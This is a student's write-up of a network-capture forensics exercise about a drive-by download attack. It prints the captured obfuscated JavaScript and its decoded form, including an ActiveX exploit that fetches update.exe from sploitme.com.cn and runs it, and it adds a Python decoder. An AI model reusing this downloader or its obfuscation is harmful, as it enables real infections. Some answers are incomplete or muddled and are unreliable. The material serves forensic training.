My Second PCAP Exercise

081710_Bilog_report_pcap2
  1. List the protocols found in the capture. What protocol do you think the attack is/are based on? (2pts)
The attack was based on the HTTP protocol: HTTP was used for malware distribution, and the HTTP streams carry the browser exploits, which is what reveals the attack.
The protocols found in the capture are the following:
a)   HTTP
b)   Netbios-ns
c)   Netbios-dgm
d)   ICMP
e)   domain
  2. List IPs, hosts names / domain names. What can you tell about it? What to deduce from the setup? Does it look like real situations? (4pts)
·        rapidshare.com.eyu32.ru
·        sploitme.com.cn
·        shop.honeynet.sg
·        google
·        google.fr
·        honeynet.org
·        clients1.google.fr
The hosts appear to be in the same workgroup. The setup could be virtual machines with both Windows and Linux guests. The attack doesn't look like a real situation; it may have been staged, given the virtual machine setup.
  3. List all the web pages. List those visited containing suspect and possibly malicious javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages (6pts)

·        http://www.honeynet.org/
·        http://www.google.com/
·        http://www.google.fr/
·        10.0.2.15 and 10.0.3.15 connect to http://sploitme.com.cn/?click=3feb5a6b2f
·        http://sploitme.com.cn/?click=84c090bd86 requested by 10.0.4.15
·        10.0.2.15 and 10.0.3.15 are directed to http://rapidshare.com.eyu32.ru/login.php
The “?click=” URLs could have been loaded from suspicious JavaScript, while the others look safe.
  4. Can you sketch an overview of the general actions performed by the attacker? (2pts)
  5. What steps are taken to slow the analysis down? (2pts)
a) The pages contained obfuscated JavaScript code.
b) The malicious pages are disguised as 404 pages.
c) The first connection to sploitme.com.cn triggered the exploit service.
d) Serving the page content takes an extra step: the server identifies the client IP to decide whether to make the content accessible or to serve a clean 404 page to the client.
  6. Provide the javascripts from the pages identified in the previous question. Decode/de-obfuscate them too. (8pts)
var s="=jgsbnf!tsd>#iuuq;00tqmpjunf/dpn/do0@dmjdl>95d1:1ce97#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?";
m="";
for(i=0;i<s.length;i++)
{
if(s.charCodeAt(i)==28)
{
m+="&";
}
else if(s.charCodeAt(i)==23)
{
m+= "!";
}
else
{
m+=String.fromCharCode(s.charCodeAt(i)-1);
}
}

document.write(m);

DECODED:

m = '<iframe src="http://sploitme.com.cn/?click=84c090bd86" width=1 height=1 style="visibility: hidden"></iframe>'

<script language='JavaScript'>
<!--
var CRYPT={
signature:'CGerjg56R',
_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',
decode:function(input){
var output='';
var chr1,chr2,chr3;
var enc1,enc2,enc3,enc4;
var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');
while(i<input.length){
enc1=this._keyStr.indexOf(input.charAt(i++));
enc2=this._keyStr.indexOf(input.charAt(i++));
enc3=this._keyStr.indexOf(input.charAt(i++));
enc4=this._keyStr.indexOf(input.charAt(i++));
chr1=(enc1<<2)|(enc2>>4);
chr2=((enc2&15)<<4)|(enc3>>2);
chr3=((enc3&3)<<6)|enc4;
output=output+String.fromCharCode(chr1);
if(enc3!=64){output=output+String.fromCharCode(chr2);}
if(enc4!=64){output=output+String.fromCharCode(chr3);}
}
output=CRYPT._utf8_decode(output);
return output;
},
_utf8_decode:function(utftext){
var string='';
var i=0;
var c=0,c1=0,c2=0,c3=0;
while(i<utftext.length){
c=utftext.charCodeAt(i);
if(c<128){
string+=String.fromCharCode(c);
i++;
}else if((c>191)&&(c<224)){
c2=utftext.charCodeAt(i+1);
string+=String.fromCharCode(((c&31)<<6)|(c2&63));
i+=2;
}else{
c2=utftext.charCodeAt(i+1);
c3=utftext.charCodeAt(i+2);
string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));
i+=3;
}
}
return string;
},
obfuscate:function(str){
var container='';
for(var i=0,z=0;i<str.length;i=i+3,z++){
container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));
}
return CRYPT.decode(container);
}
}
eval(CRYPT.obfuscate('1571811872311951541351661801171232041951561601691531531871792011851912141281421981
89161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122
13017014421018421120110414013014618017522919519010616815618819022219117416817212916618312816822319615215
11631601151681881712231761221321931571581792281891891181651571551871512031941761561531911531911812011591
52151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223
19220915312118517215518919215820114017320314317920519219017215713916813713620618919021911014313213711919
01642092141431371901221711731881592041041281901661551502311961911521571631541491492111941931611411511241
76198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166
18312819016417615114210418517816118422216120312512813516812217522220518710217117215517020420117515213013
71541491192001841802111521421681751701521952171781371701391561211711621951531561651721501791562161941521
10121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215
18917313019112419019120115821412616118213715716818722117615811119115719215823620317411010515817713721221
31741601631441701491731902012182071541221301871452111871631761581701601561591832251822131271581801761532
19212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151
18721320421120717414417013618820022319222515212513918417015120019119314115813014715514921918318612616618
31181452092141781891741521871331192002241922111321051311751691731922142041041281901671431872352042081191
63171154191223204190219110156163179139199164155222151125168115161184217218182172115143'));
//-->
</script>

DECODED:

function Complete() {
setTimeout('location.href = "about:blank',2000);
}
function CheckIP() {
var req=null;
try{
req=new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e){
try{
req=new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e){
try{
req=new XMLHttpRequest();
}
catch(e){}
}
}
if(req==null)return"0";
req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);
req.send(null);
if(req.responseText=="1"){
return true;
}
else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';
var filename='update.exe';
function CreateO(o,n){
var r=null;
try{
r=o.CreateObject(n)
}
catch(e){}
if(!r){
try{
r=o.CreateObject(n,'')
}
catch(e){}
}
if(!r){
try{
r=o.CreateObject(n,'','')
}
catch(e){}
}
if(!r){
try{
r=o.GetObject('',n)
}
catch(e){}
}
if(!r){
try{
r=o.GetObject(n,'')
}
catch(e){}
}
if(!r){
try{
r=o.GetObject(n)
}
catch(e){}
}
return r;
}
function Go(a){
var s=CreateO(a,'WScript.Shell');
var o=CreateO(a,'ADODB.Stream');
var e=s.Environment('Process');
var xhr=null;
var bin=e.Item('TEMP')+'\\'+filename;
try{
xhr=new XMLHttpRequest();
}
catch(e){
try{
xhr=new ActiveXObject('Microsoft.XMLHTTP');
}
catch(e){
xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');
}
}
if(!xhr)return(0);
xhr.open('GET',urltofile,false)
xhr.send(null);
var filecontent=xhr.responseBody;
o.Type=1; //Binary data
o.Mode=3; // mode rw
o.Open();
o.Write(filecontent);
o.SaveToFile(bin,2); // saves to file, overwrites if exists.
s.Run(bin,0); // execute downloaded binary.
}
function mdac(){
var i=0;
var objects=new Array(
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879cdc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
null);
while(objects[i]){
var a=null;
if(objects[i].substring(0,1)=='{'){
a=document.createElement('object');
a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));
}
else {
try{
a=new ActiveXObject(objects[i]);
}
catch(e){}
}
if(a){
try{
var b=CreateO(a,'WScript.Shell');
if(b){
if(Go(a)){
if(CheckIP()){
Complete();
}
else {
Complete();
}
return true;
}
}
}
catch(e){}
}
i++;
}
Complete();
}
mdac();

(http://jsunpack.jeek.org/dec/go?report=5c500b07f9acce721ceafa5863416c0042b2ac32)
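To verify the two decodings above without executing any of the captured scripts, here is an added Python re-implementation of both transforms (it is not part of the original report or the challenge materials): the shift-by-one decoder from the first page and the 3-digit-group/base64 scheme of CRYPT.obfuscate. The digit prefix and the signature 'CGerjg56R' are taken from the page; the short '<b>hi</b>' sample is constructed.

```python
import base64
import re

# Added example: static re-implementation of the two decoding transforms
# seen in the captured pages, so the scripts never have to be executed.

def decode_shift(s: str) -> str:
    """Scheme 1 (first page): every character was stored with its char code
    raised by one; codes 28 and 23 are escapes for '&' and '!'."""
    out = []
    for ch in s:
        code = ord(ch)
        if code == 28:
            out.append("&")
        elif code == 23:
            out.append("!")
        else:
            out.append(chr(code - 1))
    return "".join(out)

def decode_crypt(digits: str, signature: str) -> str:
    """Scheme 2 (CRYPT.obfuscate): the payload is a run of 3-digit numbers;
    each one minus the char code of the rotating signature character gives
    one base64 character, and the base64 text decodes to UTF-8 source."""
    digits = "".join(digits.split())            # tolerate line-wrapped input
    b64 = []
    for z, i in enumerate(range(0, len(digits), 3)):
        key = ord(signature[z % len(signature)])
        val = int(digits[i:i + 3]) - key
        if not 0 <= val < 0x110000:
            raise ValueError(f"group {z} at offset {i} does not decode to a character")
        b64.append(chr(val))
    text = re.sub(r"[^A-Za-z0-9+/=]", "", "".join(b64))   # same filter as the JS decoder
    text += "=" * (-len(text) % 4)              # the JS decoder tolerates missing padding
    return base64.b64decode(text).decode("utf-8", errors="replace")

if __name__ == "__main__":
    # Constructed sample for scheme 1 (not from the capture): "<b>hi</b>" shifted up by one.
    print(decode_shift("=c?ij=0c?"))
    # First 36 digits of the page's CRYPT payload with its signature 'CGerjg56R'.
    print(decode_crypt("157181187231195154135166180117123204", "CGerjg56R"))
```

Feeding the whole wrapped digit string from the page into decode_crypt reproduces the decoded script shown above.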
  7. On the malicious URLs, what do you think the variable 's' refers to? List the differences. (2pts)
·        s=3feb5a6b2f
·        s=84c090bd86
The 's' refers to the traffic source ID. The two values are served different exploit sets, delivered to victims browsing web sites that were either acquired or compromised.
  8. Which operating system was targeted by the attacks? Which software? And which vulnerabilities? Could the attacks been prevented? (4pts)
Windows XP SP2 was the victim operating system, with Internet Explorer and MS Office as the targeted software.
The following vulnerabilities have been found:
·        Mdac : WScript.Shell - MS06-014
·        Aolwinamp: IWinAmpActiveX.ConvertFile
·        Directshow: 'msvidctl.dll' - MS09-032 - MS09-037
·        Snapshot: MSOfficeSnapshotViewer - MS08-041
·        Com: 'msdds.dll' COM Object - MS05-052
·        Spreadsheet: OWC10.Spreadsheet - MS09-43

Yes. The attacks would have been prevented if all the software involved had been kept up to date.
  9. Was there malware involved? What is the purpose of the malware(s)? (We are not looking for a detailed malware analysis for this.) (5pts)
Yes. The purpose of the malware was to start Internet Explorer on the site honeynet.org, where it makes the client download a file from the malware distribution site and execute it.


Bonus points:
  1. What actions do the shellcodes perform? Please list the shellcodes (+md5 of the binaries). What's the difference between them? (8pts)
Shellcode:
·        MD5 1dacf1fbf175fe5361b8601e40deb7f0
·        MD5 41d013ae668ceee5ee4402bcea7933ce
·        MD5 22bed6879e586f9858deb74f61b54de4
·        MD5 9167201943cc4524d5fc59d57af6bca6